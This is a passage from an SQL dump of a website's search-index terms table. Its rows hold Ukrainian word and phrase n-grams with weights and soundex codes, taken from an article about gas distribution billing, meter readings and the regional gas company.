gazovogo','den potochnogo gazovogo',0,1,1.7667,'D51325212',1,'*'),(1686124,'gazovogo','gazovogo',0,0,0.5333,'G120',1,'*'),(1686125,'gazovogo roku','gazovogo roku',0,1,1.4333,'G1262',1,'*'),(1686126,'novini 2 2535','novini 2 2535',0,1,1.4333,'N150',1,'*'),(1686127,'ostannij','ostannij',0,0,0.5333,'O2352',1,'*'),(1686128,'ostannij den','ostannij den',0,1,1.4,'O235235',1,'*'),(1686129,'ostannij den potochnogo','ostannij den potochnogo',0,1,1.7667,'O23523513252',1,'*'),(1686130,'potochnogo','potochnogo',0,0,0.6667,'P3252',1,'*'),(1686131,'potochnogo gazovogo','potochnogo gazovogo',0,1,1.6333,'P325212',1,'*'),(1686132,'potochnogo gazovogo roku','potochnogo gazovogo roku',0,1,1.8,'P32521262',1,'*'),(1686133,'roku ostannij','roku ostannij',0,1,1.4333,'R2352',1,'*'),(1686134,'roku ostannij den','roku ostannij den',0,1,1.5667,'R235235',1,'*'),(1686135,'veresnya','veresnya',0,0,0.5333,'V625',1,'*'),(1686136,'veresnya 2021','veresnya 2021',0,1,1.4333,'V625',1,'*'),(1686137,'veresnya 2021 roku','veresnya 2021 roku',0,1,1.6,'V62562',1,'*'),(1686138,'і впродовж','і впродовж',0,1,1.3333,'і000',1,'*'),(1686139,'і впродовж усього','і впродовж усього',0,1,1.5667,'і000',1,'*'),(1686140,'із 1','із 1',0,1,1.1333,'і000',2,'*'),(1686141,'із 1 жовтня','із 1 жовтня',0,1,1.3667,'і000',2,'*'),(1686142,'із розрахунку','із розрахунку',0,1,1.4333,'і000',1,'*'),(1686143,'із розрахунку місячної','із розрахунку місячної',0,1,1.7333,'і000',1,'*'),(1686144,'а отже','а отже',0,1,1.2,'а000',1,'*'),(1686145,'а отже до','а отже до',0,1,1.3,'а000',1,'*'),(1686146,'адже саме','адже саме',0,1,1.3,'а000',2,'*'),(1686147,'адже саме на','адже саме на',0,1,1.4,'а000',2,'*'),(1686148,'буде здійснюватися','буде здійснюватися',0,1,1.6,'б000',1,'*'),(1686149,'буде здійснюватися розрахунок','буде здійснюватися розрахунок',0,1,1.9667,'б000',1,'*'),(1686150,'будьте','будьте',0,0,0.4,'б000',1,'*'),(1686151,'будьте пильними','будьте пильними',0,1,1.5,'б000',1,'*'),(1686152,'будьте пильними не','будьте пильними не',0,1,1.6,'б000',1,'*'),(1686153,'відома адже','відома адже',0,1,1.3667,'в000',1,'*'),(1686154,'відома адже саме','відома адже саме',0,1,1.5333,'в000',1,'*'),(1686155,'відповідно до вимог','відповідно до вимог',0,1,1.6333,'в000',1,'*'),(1686156,'відповідного оператора','відповідного оператора',0,1,1.7333,'в000',1,'*'),(1686157,'відповідного оператора грм','відповідного оператора грм',0,1,1.8667,'в000',1,'*'),(1686158,'віртуальні','віртуальні',0,0,0.6667,'в000',1,'*'),(1686159,'віртуальні куби','віртуальні куби',0,1,1.5,'в000',1,'*'),(1686160,'віртуальні куби яких','віртуальні куби яких',0,1,1.6667,'в000',1,'*'),(1686161,'вам віртуальні','вам віртуальні',0,1,1.4667,'в000',1,'*'),(1686162,'вам віртуальні куби','вам віртуальні куби',0,1,1.6333,'в000',1,'*'),(1686163,'вартість послуги','вартість послуги',0,1,1.5333,'в000',1,'*'),(1686164,'вартість послуги розподілу','вартість послуги розподілу',0,1,1.8667,'в000',1,'*'),(1686165,'вартості','вартості',0,0,0.5333,'в000',1,'*'),(1686166,'вартості одного','вартості одного',0,1,1.5,'в000',1,'*'),(1686167,'вартості одного кубічного','вартості одного кубічного',0,1,1.8333,'в000',1,'*'),(1686168,'ваші','ваші',0,0,0.2667,'в000',1,'*'),(1686169,'ваші покази','ваші покази',0,1,1.3667,'в000',1,'*'),(1686170,'ваші покази облгаз','ваші покази облгаз',0,1,1.6,'в000',1,'*'),(1686171,'величини','величини',0,0,0.5333,'в000',1,'*'),(1686172,'величини річної','величини річної',0,1,1.5,'в000',1,'*'),(1686173,'величини річної замовленої','величини річної замовленої',0,1,1.8667,'в000',1,'*'),(1686174,'вересня 2021','вересня 2021',0,1,1.4,'в000',2,'*'),(1686175,'вересня 2021 року','вересня 2021 року',0,1,1.5667,'в000',2,'*'),(1686176,'взяв','взяв',0,0,0.2667,'в000',1,'*'),(1686177,'взяв до','взяв до',0,1,1.2333,'в000',1,'*'),(1686178,'взяв до відома','взяв до відома',0,1,1.4667,'в000',1,'*'),(1686179,'ви насправді','ви насправді',0,1,1.4,'в000',1,'*'),(1686180,'ви насправді не','ви насправді не',0,1,1.5,'в000',1,'*'),(1686181,'визначається відповідно','визначається відповідно',0,1,1.7667,'в000',1,'*'),(1686182,'визначається відповідно до','визначається відповідно до',0,1,1.8667,'в000',1,'*'),(1686183,'визначається оператором','визначається оператором',0,1,1.7667,'в000',1,'*'),(1686184,'визначається оператором грм','визначається оператором грм',0,1,1.9,'в000',1,'*'),(1686185,'визначається як','визначається як',0,1,1.5,'в000',1,'*'),(1686186,'визначається як добуток','визначається як добуток',0,1,1.7667,'в000',1,'*'),(1686187,'вимог','вимог',0,0,0.3333,'в000',1,'*'),(1686188,'вимог цього','вимог цього',0,1,1.3667,'в000',1,'*'),(1686189,'вимог цього кодексу','вимог цього кодексу',0,1,1.6333,'в000',1,'*'),(1686190,'випадків','випадків',0,0,0.5333,'в000',1,'*'),(1686191,'випадків передбачених','випадків передбачених',0,1,1.7,'в000',1,'*'),(1686192,'випадків передбачених цією','випадків передбачених цією',0,1,1.8667,'в000',1,'*'),(1686193,'виходячи','виходячи',0,0,0.5333,'в000',1,'*'),(1686194,'виходячи з','виходячи з',0,1,1.3333,'в000',1,'*'),(1686195,'виходячи з величини','виходячи з величини',0,1,1.6333,'в000',1,'*'),(1686196,'виходячи з фактичного','виходячи з фактичного',0,1,1.7,'в000',1,'*'),(1686197,'власного','власного',0,0,0.5333,'в000',1,'*'),(1686198,'власного лічильника','власного лічильника',0,1,1.6333,'в000',1,'*'),(1686199,'власного лічильника станом','власного лічильника станом',0,1,1.8667,'в000',1,'*'),(1686200,'впродовж','впродовж',0,0,0.5333,'в000',1,'*'),(1686201,'впродовж усього','впродовж усього',0,1,1.5,'в000',1,'*'),(1686202,'впродовж усього 2022','впродовж усього 2022',0,1,1.6667,'в000',1,'*'),(1686203,'встановлений','встановлений',0,0,0.8,'в000',1,'*'),(1686204,'встановлений регулятором','встановлений регулятором',0,1,1.8,'в000',1,'*'),(1686205,'встановлений регулятором для','встановлений регулятором для',0,1,1.9333,'в000',1,'*'),(1686206,'газовий','газовий',0,0,0.4667,'г000',1,'*'),(1686207,'газовий рік','газовий рік',0,1,1.3667,'г000',1,'*'),(1686208,'газовий рік що','газовий рік що',0,1,1.4667,'г000',1,'*'),(1686209,'газовий рік який','газовий рік який',0,1,1.5333,'г000',1,'*'),(1686210,'газового','газового',0,0,0.5333,'г000',1,'*'),(1686211,'газового року','газового року',0,1,1.4333,'г000',1,'*'),(1686212,'газу визначається','газу визначається',0,1,1.5667,'г000',1,'*'),(1686213,'газу визначається як','газу визначається як',0,1,1.6667,'г000',1,'*'),(1686214,'газу за','газу за',0,1,1.2333,'г000',2,'*'),(1686215,'газу за період','газу за період',0,1,1.4667,'г000',2,'*'),(1686216,'газу здійснюються','газу здійснюються',0,1,1.5667,'г000',1,'*'),(1686217,'газу здійснюються виходячи','газу здійснюються виходячи',0,1,1.8667,'г000',1,'*'),(1686218,'газу кожному','газу кожному',0,1,1.4,'г000',2,'*'),(1686219,'газу кожному домогосподарству','газу кожному домогосподарству',0,1,1.9667,'г000',2,'*'),(1686220,'газу цим','газу цим',0,1,1.2667,'г000',1,'*'),(1686221,'газу цим об\'єктом','газу цим об',0,1,1.5667,'г000',1,'*'),(1686222,'газу що','газу що',0,1,1.2333,'г000',1,'*'),(1686223,'газу що надається','газу що надається',0,1,1.5667,'г000',1,'*'),(1686224,'главою','главою',0,0,0.4,'г000',1,'*'),(1686225,'грм','грм',0,0,0.2,'г000',1,'*'),(1686226,'грм 1','грм 1',0,1,1.1667,'г000',1,'*'),(1686227,'грм 1 розрахунки','грм 1 розрахунки',0,1,1.5333,'г000',1,'*'),(1686228,'грм із','грм із',0,1,1.2,'г000',1,'*'),(1686229,'грм із розрахунку','грм із розрахунку',0,1,1.5667,'г000',1,'*'),(1686230,'грм виходячи','грм виходячи',0,1,1.4,'г000',1,'*'),(1686231,'грм виходячи з','грм виходячи з',0,1,1.4667,'г000',1,'*'),(1686232,'грм за','грм за',0,1,1.2,'г000',1,'*'),(1686233,'грм за договором','грм за договором',0,1,1.5333,'г000',1,'*'),(1686234,'дайте','дайте',0,0,0.3333,'д000',1,'*'),(1686235,'дайте облгазу','дайте облгазу',0,1,1.4333,'д000',1,'*'),(1686236,'дайте облгазу себе','дайте облгазу себе',0,1,1.6,'д000',1,'*'),(1686237,'день поточного','день поточного',0,1,1.4667,'д000',1,'*'),(1686238,'день поточного газового','день поточного газового',0,1,1.7667,'д000',1,'*'),(1686239,'для відповідного','для відповідного',0,1,1.5333,'д000',1,'*'),(1686240,'для відповідного оператора','для відповідного оператора',0,1,1.8667,'д000',1,'*'),(1686241,'до 5','до 5',0,1,1.1333,'д000',1,'*'),(1686242,'до 5 жовтня','до 5 жовтня',0,1,1.3667,'д000',1,'*'),(1686243,'до відома адже','до відома адже',0,1,1.4667,'д000',1,'*'),(1686244,'до вимог','до вимог',0,1,1.2667,'д000',1,'*'),(1686245,'до вимог цього','до вимог цього',0,1,1.4667,'д000',1,'*'),(1686246,'добуток','добуток',0,0,0.4667,'д000',1,'*'),(1686247,'добуток 1','добуток 1',0,1,1.3,'д000',1,'*'),(1686248,'добуток 1 12','добуток 1 12',0,1,1.4,'д000',1,'*'),(1686249,'договором','договором',0,0,0.6,'д000',1,'*'),(1686250,'договором розподілу','договором розподілу',0,1,1.6333,'д000',1,'*'),(1686251,'договором розподілу природного','договором розподілу природного',0,1,2,'д000',1,'*'),(1686252,'домалювати','домалювати',0,0,0.6667,'д000',1,'*'),(1686253,'домалювати вам','домалювати вам',0,1,1.4667,'д000',1,'*'),(1686254,'домалювати вам віртуальні','домалювати вам віртуальні',0,1,1.8333,'д000',1,'*'),(1686255,'домогосподарству','домогосподарству',0,0,1,'д000',2,'*'),(1686256,'домогосподарству на','домогосподарству на',0,1,1.6333,'д000',1,'*'),(1686257,'домогосподарству на наступний','домогосподарству на наступний',0,1,1.9667,'д000',1,'*'),(1686258,'доставку','доставку',0,0,0.5333,'д000',2,'*'),(1686259,'доставку газу','доставку газу',0,1,1.4333,'д000',1,'*'),(1686260,'доставку газу кожному','доставку газу кожному',0,1,1.7,'д000',1,'*'),(1686261,'жовтня 2021','жовтня 2021',0,1,1.3667,'ж000',1,'*'),(1686262,'жовтня 2021 року','жовтня 2021 року',0,1,1.5333,'ж000',1,'*'),(1686263,'з величини','з величини',0,1,1.3333,'з000',1,'*'),(1686264,'з величини річної','з величини річної',0,1,1.5667,'з000',1,'*'),(1686265,'з кодексу','з кодексу',0,1,1.3,'з000',1,'*'),(1686266,'з кодексу грм','з кодексу грм',0,1,1.4333,'з000',1,'*'),(1686267,'з фактичного','з фактичного',0,1,1.4,'з000',1,'*'),(1686268,'з фактичного обсягу','з фактичного обсягу',0,1,1.6333,'з000',1,'*'),(1686269,'за газовий','за газовий',0,1,1.3333,'з000',1,'*'),(1686270,'за газовий рік','за газовий рік',0,1,1.4667,'з000',1,'*'),(1686271,'за договором','за договором',0,1,1.4,'з000',1,'*'),(1686272,'за договором розподілу','за договором розподілу',0,1,1.7333,'з000',1,'*'),(1686273,'за доставку','за доставку',0,1,1.3667,'з000',2,'*'),(1686274,'за доставку газу','за доставку газу',0,1,1.5333,'з000',1,'*'),(1686275,'за замовчуванням','за замовчуванням',0,1,1.5333,'з000',1,'*'),(1686276,'за замовчуванням об\'єкта','за замовчуванням об',0,1,1.8,'з000',1,'*'),(1686277,'за період','за період',0,1,1.3,'з000',2,'*'),(1686278,'за період із','за період із',0,1,1.4,'з000',2,'*'),(1686279,'за послугу','за послугу',0,1,1.3333,'з000',1,'*'),(1686280,'за послугу розподілу','за послугу розподілу',0,1,1.6667,'з000',1,'*'),(1686281,'закінчується','закінчується',0,0,0.8,'з000',1,'*'),(1686282,'закінчується газовий','закінчується газовий',0,1,1.6667,'з000',1,'*'),(1686283,'закінчується газовий рік','закінчується газовий рік',0,1,1.8,'з000',1,'*'),(1686284,'замовлена','замовлена',0,0,0.6,'з000',1,'*'),(1686285,'замовлена потужність','замовлена потужність',0,1,1.6667,'з000',1,'*'),(1686286,'замовлена потужність за','замовлена потужність за',0,1,1.7667,'з000',1,'*'),(1686287,'замовленої','замовленої',0,0,0.6667,'з000',1,'*'),(1686288,'замовленої потужності','замовленої потужності',0,1,1.7,'з000',1,'*'),(1686289,'замовленої потужності 3','замовленої потужності 3',0,1,1.7667,'з000',1,'*'),(1686290,'замовленої потужності об\'єкта','замовленої потужності об',0,1,1.9667,'з000',1,'*'),(1686291,'замовленоїпотужності','замовленоїпотужності',0,0,1,'з000',1,'*'),(1686292,'замовленоїпотужності об\'єкта','замовленоїпотужності об',0,1,1.9333,'з000',1,'*'),(1686293,'замовленоїпотужності об\'єкта об\'єктів','замовленоїпотужності об об',0,1,2,'з000',1,'*'),(1686294,'замовчуванням','замовчуванням',0,0,0.8667,'з000',1,'*'),(1686295,'замовчуванням об\'єкта','замовчуванням об',0,1,1.7,'з000',1,'*'),(1686296,'замовчуванням об\'єкта об\'єктів','замовчуванням об об',0,1,2,'з000',1,'*'),(1686297,'здійснюватися','здійснюватися',0,0,0.8667,'з000',1,'*'),(1686298,'здійснюватися розрахунок','здійснюватися розрахунок',0,1,1.8,'з000',1,'*'),(1686299,'здійснюватися розрахунок щомісячної','здійснюватися розрахунок щомісячної',0,1,2,'з000',1,'*'),(1686300,'здійснюються','здійснюються',0,0,0.8,'з000',1,'*'),(1686301,'здійснюються виходячи','здійснюються виходячи',0,1,1.7,'з000',1,'*'),(1686302,'здійснюються виходячи з','здійснюються виходячи з',0,1,1.7667,'з000',1,'*'),(1686303,'кінець','кінець',0,0,0.4,'к000',1,'*'),(1686304,'кінець вересня','кінець вересня',0,1,1.4667,'к000',1,'*'),(1686305,'кінець вересня 2021','кінець вересня 2021',0,1,1.6333,'к000',1,'*'),(1686306,'календарний рік','календарний рік',0,1,1.5,'к000',1,'*'),(1686307,'календарний рік визначається','календарний рік визначається',0,1,1.9333,'к000',1,'*'),(1686308,'календарного року','календарного року',0,1,1.5667,'к000',1,'*'),(1686309,'календарного року 2','календарного року 2',0,1,1.6333,'к000',1,'*'),(1686310,'календарному','календарному',0,0,0.8,'к000',1,'*'),(1686311,'календарному року','календарному року',0,1,1.5667,'к000',1,'*'),(1686312,'календарному року який','календарному року який',0,1,1.7333,'к000',1,'*'),(1686313,'кодексу','кодексу',0,0,0.4667,'к000',1,'*'),(1686314,'кодексу грм','кодексу грм',0,1,1.3667,'к000',1,'*'),(1686315,'кодексу грм 1','кодексу грм 1',0,1,1.4333,'к000',1,'*'),(1686316,'кодексу крім','кодексу крім',0,1,1.4,'к000',1,'*'),(1686317,'кодексу крім випадків','кодексу крім випадків',0,1,1.7,'к000',1,'*'),(1686318,'кожному домогосподарству','кожному домогосподарству',0,1,1.8,'к000',2,'*'),(1686319,'кожному домогосподарству на','кожному домогосподарству на',0,1,1.9,'к000',1,'*'),(1686320,'крім випадків','крім випадків',0,1,1.4333,'к000',1,'*'),(1686321,'крім випадків передбачених','крім випадків передбачених',0,1,1.8667,'к000',1,'*'),(1686322,'кубічного','кубічного',0,0,0.6,'к000',1,'*'),(1686323,'кубічного метра','кубічного метра',0,1,1.5,'к000',1,'*'),(1686324,'кубічного метра замовленої','кубічного метра замовленої',0,1,1.8667,'к000',1,'*'),(1686325,'куби','куби',0,0,0.2667,'к000',2,'*'),(1686326,'куби яких','куби яких',0,1,1.3,'к000',1,'*'),(1686327,'куби яких ви','куби яких ви',0,1,1.4,'к000',1,'*'),(1686328,'лічильника','лічильника',0,0,0.6667,'л000',2,'*'),(1686329,'лічильника станом','лічильника станом',0,1,1.5667,'л000',1,'*'),(1686330,'лічильника станом на','лічильника станом на',0,1,1.6667,'л000',1,'*'),(1686331,'місячна','місячна',0,0,0.4667,'м000',1,'*'),(1686332,'місячна вартість','місячна вартість',0,1,1.5333,'м000',1,'*'),(1686333,'місячна вартість послуги','місячна вартість послуги',0,1,1.8,'м000',1,'*'),(1686334,'місячної','місячної',0,0,0.5333,'м000',1,'*'),(1686335,'місячної вартості','місячної вартості',0,1,1.5667,'м000',1,'*'),(1686336,'місячної вартості одного','місячної вартості одного',0,1,1.8,'м000',1,'*'),(1686337,'метра','метра',0,0,0.3333,'м000',1,'*'),(1686338,'метра замовленої','метра замовленої',0,1,1.5333,'м000',1,'*'),(1686339,'метра замовленої потужності','метра замовленої потужності',0,1,1.9,'м000',1,'*'),(1686340,'на кінець','на кінець',0,1,1.3,'н000',1,'*'),(1686341,'на кінець вересня','на кінець вересня',0,1,1.5667,'н000',1,'*'),(1686342,'на наступний','на наступний',0,1,1.4,'н000',1,'*'),(1686343,'на наступний період','на наступний період',0,1,1.6333,'н000',1,'*'),(1686344,'на підставі','на підставі',0,1,1.3667,'н000',2,'*'),(1686345,'на підставі фактично','на підставі фактично',0,1,1.6667,'н000',2,'*'),(1686346,'на розрахунковий','на розрахунковий',0,1,1.5333,'н000',1,'*'),(1686347,'на розрахунковий календарний','на розрахунковий календарний',0,1,1.9333,'н000',1,'*'),(1686348,'на тариф','на тариф',0,1,1.2667,'н000',1,'*'),(1686349,'на тариф встановлений','на тариф встановлений',0,1,1.7,'н000',1,'*'),(1686350,'надається','надається',0,0,0.6,'н000',1,'*'),(1686351,'надається оператором','надається оператором',0,1,1.6667,'н000',1,'*'),(1686352,'надається оператором грм','надається оператором грм',0,1,1.8,'н000',1,'*'),(1686353,'насправді','насправді',0,0,0.6,'н000',1,'*'),(1686354,'насправді не','насправді не',0,1,1.4,'н000',1,'*'),(1686355,'насправді не споживали','насправді не споживали',0,1,1.7333,'н000',1,'*'),(1686356,'наступний','наступний',0,0,0.6,'н000',1,'*'),(1686357,'наступний період','наступний період',0,1,1.5333,'н000',1,'*'),(1686358,'наступний період з','наступний період з',0,1,1.6,'н000',1,'*'),(1686359,'не дайте','не дайте',0,1,1.2667,'н000',1,'*'),(1686360,'не дайте облгазу','не дайте облгазу',0,1,1.5333,'н000',1,'*'),(1686361,'не споживали','не споживали',0,1,1.4,'н000',1,'*'),(1686362,'не споживали з','не споживали з',0,1,1.4667,'н000',1,'*'),(1686363,'необхідно передати','необхідно передати',0,1,1.6,'н000',1,'*'),(1686364,'необхідно передати своєму','необхідно передати своєму',0,1,1.8333,'н000',1,'*'),(1686365,'об\'єктів','об',0,0,0.5333,'о000',1,'*'),(1686366,'об\'єктів споживача','об споживача',0,1,1.6,'о000',1,'*'),(1686367,'об\'єктів споживача на','об споживача на',0,1,1.7,'о000',1,'*'),(1686368,'об\'єктів споживача та','об споживача та',0,1,1.7,'о000',1,'*'),(1686369,'об\'єкта','об',0,0,0.4667,'о000',1,'*'),(1686370,'об\'єкта об\'єктів','об об',0,1,1.5333,'о000',1,'*'),(1686371,'об\'єкта об\'єктів споживача','об об споживача',0,1,1.8667,'о000',1,'*'),(1686372,'об\'єктом','об',0,0,0.5333,'о000',1,'*'),(1686373,'об\'єктом за','об за',0,1,1.3667,'о000',1,'*'),(1686374,'об\'єктом за газовий','об за газовий',0,1,1.6333,'о000',1,'*'),(1686375,'облгаз','облгаз',0,0,0.4,'о000',2,'*'),(1686376,'облгаз взяв','облгаз взяв',0,1,1.3667,'о000',1,'*'),(1686377,'облгаз взяв до','облгаз взяв до',0,1,1.4667,'о000',1,'*'),(1686378,'облгазу','облгазу',0,0,0.4667,'о000',2,'*'),(1686379,'облгазу себе','облгазу себе',0,1,1.4,'о000',1,'*'),(1686380,'облгазу себе ошукати','облгазу себе ошукати',0,1,1.6667,'о000',1,'*'),(1686381,'облгазу фактичні','облгазу фактичні',0,1,1.5333,'о000',1,'*'),(1686382,'облгазу фактичні покази','облгазу фактичні покази',0,1,1.7667,'о000',1,'*'),(1686383,'обов\'язково','обов',0,0,0.7333,'о000',1,'*'),(1686384,'обов\'язково необхідно','обов необхідно',0,1,1.7,'о000',1,'*'),(1686385,'обов\'язково необхідно передати','обов необхідно передати',0,1,2,'о000',1,'*'),(1686386,'обсягу','обсягу',0,0,0.4,'о000',1,'*'),(1686387,'обсягу споживання','обсягу споживання',0,1,1.5667,'о000',1,'*'),(1686388,'обсягу споживання природного','обсягу споживання природного',0,1,1.9333,'о000',1,'*'),(1686389,'одного кубічного','одного кубічного',0,1,1.5333,'о000',1,'*'),(1686390,'одного кубічного метра','одного кубічного метра',0,1,1.7333,'о000',1,'*'),(1686391,'оператора грм','оператора грм',0,1,1.4333,'о000',1,'*'),(1686392,'оператора грм із','оператора грм із',0,1,1.5333,'о000',1,'*'),(1686393,'оператором','оператором',0,0,0.6667,'о000',1,'*'),(1686394,'оператором грм','оператором грм',0,1,1.4667,'о000',1,'*'),(1686395,'оператором грм виходячи','оператором грм виходячи',0,1,1.7667,'о000',1,'*'),(1686396,'оператором грм за','оператором грм за',0,1,1.5667,'о000',1,'*'),(1686397,'оплачуються','оплачуються',0,0,0.7333,'о000',1,'*'),(1686398,'оплачуються споживачем','оплачуються споживачем',0,1,1.7333,'о000',1,'*'),(1686399,'оплачуються споживачем рівномірними','оплачуються споживачем рівномірними',0,1,2,'о000',1,'*'),(1686400,'останній','останній',0,0,0.5333,'о000',1,'*'),(1686401,'останній день','останній день',0,1,1.4333,'о000',1,'*'),(1686402,'останній день поточного','останній день поточного',0,1,1.7667,'о000',1,'*'),(1686403,'отже до','отже до',0,1,1.2333,'о000',1,'*'),(1686404,'отже до 5','отже до 5',0,1,1.3,'о000',1,'*'),(1686405,'ошукати','ошукати',0,0,0.4667,'о000',1,'*'),(1686406,'ошукати та','ошукати та',0,1,1.3333,'о000',1,'*'),(1686407,'ошукати та домалювати','ошукати та домалювати',0,1,1.7,'о000',1,'*'),(1686408,'підставі','підставі',0,0,0.5333,'п000',2,'*'),(1686409,'підставі фактично','підставі фактично',0,1,1.5667,'п000',2,'*'),(1686410,'підставі фактично спожитого','підставі фактично спожитого',0,1,1.9,'п000',2,'*'),(1686411,'період із','період із',0,1,1.3,'п000',2,'*'),(1686412,'період із 1','період із 1',0,1,1.3667,'п000',2,'*'),(1686413,'період з','період з',0,1,1.2667,'п000',1,'*'),(1686414,'період з 1','період з 1',0,1,1.3333,'п000',1,'*'),(1686415,'передати своєму','передати своєму',0,1,1.5,'п000',1,'*'),(1686416,'передати своєму облгазу','передати своєму облгазу',0,1,1.7667,'п000',1,'*'),(1686417,'передбачених','передбачених',0,0,0.8,'п000',1,'*'),(1686418,'передбачених цією','передбачених цією',0,1,1.5667,'п000',1,'*'),(1686419,'передбачених цією главою','передбачених цією главою',0,1,1.8,'п000',1,'*'),(1686420,'передував','передував',0,0,0.6,'п000',1,'*'),(1686421,'передував розрахунковому','передував розрахунковому',0,1,1.8,'п000',1,'*'),(1686422,'передував розрахунковому календарному','передував розрахунковому календарному',0,1,2,'п000',1,'*'),(1686423,'переконайтесь','переконайтесь',0,0,0.8667,'п000',1,'*'),(1686424,'переконайтесь що','переконайтесь що',0,1,1.5333,'п000',1,'*'),(1686425,'переконайтесь що ваші','переконайтесь що ваші',0,1,1.7,'п000',1,'*'),(1686426,'пильними','пильними',0,0,0.5333,'п000',1,'*'),(1686427,'пильними не','пильними не',0,1,1.3667,'п000',1,'*'),(1686428,'пильними не дайте','пильними не дайте',0,1,1.5667,'п000',1,'*'),(1686429,'плати за','плати за',0,1,1.2667,'п000',2,'*'),(1686430,'плати за доставку','плати за доставку',0,1,1.5667,'п000',2,'*'),(1686431,'по 30','по 30',0,1,1.1667,'п000',2,'*'),(1686432,'по 30 вересня','по 30 вересня',0,1,1.4333,'п000',2,'*'),(1686433,'побутовим','побутовим',0,0,0.6,'п000',1,'*'),(1686434,'побутовим споживачам','побутовим споживачам',0,1,1.6667,'п000',1,'*'),(1686435,'побутовим споживачам обов\'язково','побутовим споживачам обов',0,1,2,'п000',1,'*'),(1686436,'покази','покази',0,0,0.4,'п000',1,'*'),(1686437,'покази власного','покази власного',0,1,1.5,'п000',1,'*'),(1686438,'покази власного лічильника','покази власного лічильника',0,1,1.8667,'п000',1,'*'),(1686439,'покази облгаз','покази облгаз',0,1,1.4333,'п000',1,'*'),(1686440,'покази облгаз взяв','покази облгаз взяв',0,1,1.6,'п000',1,'*'),(1686441,'послуги','послуги',0,0,0.4667,'п000',1,'*'),(1686442,'послуги розподілу','послуги розподілу',0,1,1.5667,'п000',1,'*'),(1686443,'послуги розподілу природного','послуги розподілу природного',0,1,1.9333,'п000',1,'*'),(1686444,'послугу','послугу',0,0,0.4667,'п000',1,'*'),(1686445,'послугу розподілу','послугу розподілу',0,1,1.5667,'п000',1,'*'),(1686446,'послугу розподілу природного','послугу розподілу природного',0,1,1.9333,'п000',1,'*'),(1686447,'поточного','поточного',0,0,0.6,'п000',1,'*'),(1686448,'поточного газового','поточного газового',0,1,1.6,'п000',1,'*'),(1686449,'поточного газового року','поточного газового року',0,1,1.7667,'п000',1,'*'),(1686450,'потужність','потужність',0,0,0.6667,'п000',1,'*'),(1686451,'потужність за','потужність за',0,1,1.4333,'п000',1,'*'),(1686452,'потужність за замовчуванням','потужність за замовчуванням',0,1,1.9,'п000',1,'*'),(1686453,'потужності','потужності',0,0,0.6667,'п000',1,'*'),(1686454,'потужності 3','потужності 3',0,1,1.4,'п000',1,'*'),(1686455,'потужності 3 річна','потужності 3 річна',0,1,1.6,'п000',1,'*'),(1686456,'потужності об\'єкта','потужності об',0,1,1.6,'п000',1,'*'),(1686457,'потужності об\'єкта об\'єктів','потужності об об',0,1,1.9,'п000',1,'*'),(1686458,'природного газу визначається','природного газу визначається',0,1,1.9333,'п000',1,'*'),(1686459,'природного газу здійснюються','природного газу здійснюються',0,1,1.9333,'п000',1,'*'),(1686460,'природного газу цим','природного газу цим',0,1,1.6333,'п000',1,'*'),(1686461,'природного газу що','природного газу що',0,1,1.6,'п000',1,'*'),(1686462,'протягом календарного','протягом календарного',0,1,1.7,'п000',1,'*'),(1686463,'протягом календарного року','протягом календарного року',0,1,1.8667,'п000',1,'*'),(1686464,'рівномірними','рівномірними',0,0,0.8,'р000',1,'*'),(1686465,'рівномірними частками','рівномірними частками',0,1,1.7,'р000',1,'*'),(1686466,'рівномірними частками протягом','рівномірними частками протягом',0,1,2,'р000',1,'*'),(1686467,'рік визначається','рік визначається',0,1,1.5333,'р000',1,'*'),(1686468,'рік визначається оператором','рік визначається оператором',0,1,1.9,'р000',1,'*'),(1686469,'рік що','рік що',0,1,1.2,'р000',1,'*'),(1686470,'рік що передував','рік що передував',0,1,1.5333,'р000',1,'*'),(1686471,'рік який','рік який',0,1,1.2667,'р000',1,'*'),(1686472,'рік який тривав','рік який тривав',0,1,1.5,'р000',1,'*'),(1686473,'річна замовлена','річна замовлена',0,1,1.5,'р000',1,'*'),(1686474,'річна замовлена потужність','річна замовлена потужність',0,1,1.8667,'р000',1,'*'),(1686475,'річної','річної',0,0,0.4,'р000',1,'*'),(1686476,'річної замовленої','річної замовленої',0,1,1.5667,'р000',1,'*'),(1686477,'річної замовленої потужності','річної замовленої потужності',0,1,1.9333,'р000',1,'*'),(1686478,'річної замовленоїпотужності','річної замовленоїпотужності',0,1,1.9,'р000',1,'*'),(1686479,'річної замовленоїпотужності об\'єкта','річної замовленоїпотужності об',0,1,2,'р000',1,'*'),(1686480,'регулятором','регулятором',0,0,0.7333,'р000',1,'*'),(1686481,'регулятором для','регулятором для',0,1,1.5,'р000',1,'*'),(1686482,'регулятором для відповідного','регулятором для відповідного',0,1,1.9333,'р000',1,'*'),(1686483,'розподілу','розподілу',0,0,0.6,'р000',1,'*'),(1686484,'розподілу природного','розподілу природного',0,1,1.6667,'р000',1,'*'),(1686485,'розподілу природного газу','розподілу природного газу',0,1,1.8333,'р000',1,'*'),(1686486,'розрахунки','розрахунки',0,0,0.6667,'р000',1,'*'),(1686487,'розрахунки споживача','розрахунки споживача',0,1,1.6667,'р000',1,'*'),(1686488,'розрахунки споживача за','розрахунки споживача за',0,1,1.7667,'р000',1,'*'),(1686489,'розрахунковий','розрахунковий',0,0,0.8667,'р000',1,'*'),(1686490,'розрахунковий календарний','розрахунковий календарний',0,1,1.8333,'р000',1,'*'),(1686491,'розрахунковий календарний рік','розрахунковий календарний рік',0,1,1.9667,'р000',1,'*'),(1686492,'розрахунковому','розрахунковому',0,0,0.9333,'р000',1,'*'),(1686493,'розрахунковому календарному','розрахунковому календарному',0,1,1.9,'р000',1,'*'),(1686494,'розрахунковому календарному року','розрахунковому календарному року',0,1,2,'р000',1,'*'),(1686495,'розрахунку','розрахунку',0,0,0.6667,'р000',1,'*'),(1686496,'розрахунку місячної','розрахунку місячної',0,1,1.6333,'р000',1,'*'),(1686497,'розрахунку місячної вартості','розрахунку місячної вартості',0,1,1.9333,'р000',1,'*'),(1686498,'розрахунок','розрахунок',0,0,0.6667,'р000',2,'*'),(1686499,'розрахунок щомісячної','розрахунок щомісячної',0,1,1.7,'р000',2,'*'),(1686500,'розрахунок щомісячної плати','розрахунок щомісячної плати',0,1,1.9,'р000',2,'*'),(1686501,'року 2','року 2',0,1,1.2,'р000',1,'*'),(1686502,'року 2 місячна','року 2 місячна',0,1,1.4667,'р000',1,'*'),(1686503,'року і','року і',0,1,1.2,'р000',1,'*'),(1686504,'року і впродовж','року і впродовж',0,1,1.5,'р000',1,'*'),(1686505,'року а','року а',0,1,1.2,'р000',1,'*'),(1686506,'року а отже','року а 